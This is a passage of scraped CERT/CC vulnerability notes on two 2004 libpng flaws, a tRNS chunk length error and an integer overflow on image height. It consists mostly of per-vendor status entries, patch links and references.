Corporation __ Affected\n\nNotified: July 16, 2004 Updated: June 14, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [MS05-009](<http://www.microsoft.com/technet/security/Bulletin/MS05-009.mspx>) and 
[MS05-025](<http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>) for information concerning this vulnerability and its remediation.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### MontaVista Software Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### OpenPKG Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Slackware Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### SuSE Inc. 
Affected\n\nNotified: July 16, 2004 Updated: July 27, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Trustix Secure Linux Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### libpng.org __ Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis issue has been resolved in libpng version [1.2.6rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258107>) (release candidate 1). 
An older version of libpng containing the backported fixes, [1.0.16rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258106>), is also available.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Juniper Networks __ Not Affected\n\nNotified: July 16, 2004 Updated: July 27, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nJuniper Networks products are not susceptible to this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### NEC Corporation __ Not Affected\n\nNotified: July 16, 2004 Updated: August 02, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`sent on August 2, 2004` \n \n`[Software Products]` \n \n` * E-mail client software \"WeMail\"` \n` (shareware developped by NEC Communication Systems,Ltd.)` \n` - is NOT vulnerable.` \n` It does not include any code originated from libPNG.` \n \n` * We continue to try to investigate other products possibly affected` \n` by these vulnerabilities.`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### BSDI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any 
further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Conectiva Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Cray Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Debian Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Engarde Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe 
vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### FreeBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Fujitsu Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Hitachi Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement 
from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### IBM Unknown\n\nNotified: July 16, 2004 Updated: July 30, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### IBM eServer Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### IBM-zSeries Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### IMmunix Unknown\n\nUpdated: July 23, 2004 \n\n### 
Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Ingrian Networks Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### MandrakeSoft Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### NETBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### 
Nokia Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Novell Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Openwall GNU/*/Linux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Red Hat Inc. 
Unknown\n\nNotified: July 16, 2004 Updated: July 27, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### SGI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### ScO Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Sequent Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us 
[email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Sony Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Sun Microsystems Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### TurboLinux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### Wind River Systems Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### eMC Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\n### uNisys Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23388984 Feedback>).\n\nView all 40 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://scary.beasts.org/security/CESA-2004-001.txt>\n * <http://www.libpng.org/pub/png/>\n * <http://libpng.sourceforge.net/>\n * <http://www.libpng.org/pub/png/spec/1.2/PNG-Chunks.html>\n * <http://www.microsoft.com/technet/security/Bulletin/MS05-009.mspx>\n\n### 
Acknowledgements\n\nThanks to Chris Evans for reporting this vulnerability.\n\nThis document was written by Chad Dougherty and Damon Morda.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2004-0597](<http://web.nvd.nist.gov/vuln/detail/CVE-2004-0597>) \n---|--- \n**Severity Metric:** | 20.11 \n**Date Public:** | 2004-08-04 \n**Date First Published:** | 2004-08-04 \n**Date Last Updated: ** | 2005-06-14 20:58 UTC \n**Document Revision: ** | 39 \n", "modified": "2005-06-14T20:58:00", "published": "2004-08-04T00:00:00", "id": "VU:388984", "href": "https://www.kb.cert.org/vuls/id/388984", "type": "cert", "title": "libpng fails to properly check length of transparency chunk (tRNS) data", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T20:43:46", "bulletinFamily": "info", "cvelist": ["CVE-2004-0599"], "description": "### Overview \n\nThe Portable Network Graphics library ([libpng](<http://www.libpng.org/pub/png/libpng.html>)) contains a remotely exploitable vulnerability which could cause affected applications to crash.\n\n### Description \n\nThe Portable Network Graphics ([PNG](<http://www.libpng.org/pub/png/spec/1.2/PNG-Contents.html>)[](<http://www.libpng.org/pub/png/>)) image format is used as an alternative to other image formats such as the Graphics Interchange Format (GIF). The libpng reference library is available for application developers to support the PNG image format.\n\nAn integer overflow error exists in the handling of PNG image height within the `png_read_png()` function. As a result, a PNG image with excessive height may cause an integer overflow on a memory allocation and could cause the affected application to crash. \n \nMultiple applications support the PNG image format including web browsers, email clients, and various graphic utilities. 
Because multiple products have used the libpng reference library to implement native PNG image processing, multiple applications will be affected by this issue in different ways. \n \n--- \n \n### Impact \n\nAn attacker could cause a vulnerable application to crash by supplying a specially-crafted PNG image. Vulnerable applications that read images from network sources could be exploited remotely. \n \n--- \n \n### Solution \n\n**Apply a patch from the vendor** \n \nPatches have been released to address this vulnerability. Please see the Systems Affected section of this document for more details. \n \n--- \n \n### Vendor Information\n\n160448\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer Inc. Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### MontaVista Software Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### libpng.org __ 
Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis issue has been resolved in libpng version [1.2.6rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258107>) (release candidate 1). An older version of libpng containing the backported fixes, [1.0.16rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258106>), is also available.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### IBM __ Not Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`The AIX Operating System is not vulnerable to the issues discussed in CERT Vulnerability Notes VU#817368, VU#236656, VU#477512, VU#160448 and VU#286464.`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Juniper Networks __ Not Affected\n\nNotified: July 16, 2004 Updated: July 23, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Juniper Networks products are not susceptible to this vulnerability`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us 
[email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### NEC Corporation __ Not Affected\n\nNotified: July 16, 2004 Updated: August 03, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`sent on August 2, 2004 \n \n[Software Products] \n \n* E-mail client software \"WeMail\" \n(shareware developped by NEC Communication Systems,Ltd.) \n- is NOT vulnerable. \nIt does not include any code originated from libPNG. \n \n* We continue to try to investigate other products possibly affected \nby these vulnerabilities. \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### BSDI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Conectiva Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Cray Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Debian Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Engarde Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### FreeBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us 
[email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Fujitsu Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Hitachi Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### IBM eServer Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional 
information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### IBM-zSeries Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### IMmunix Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Ingrian Networks Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### MandrakeSoft Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this 
time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Microsoft Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### NETBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Nokia Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### 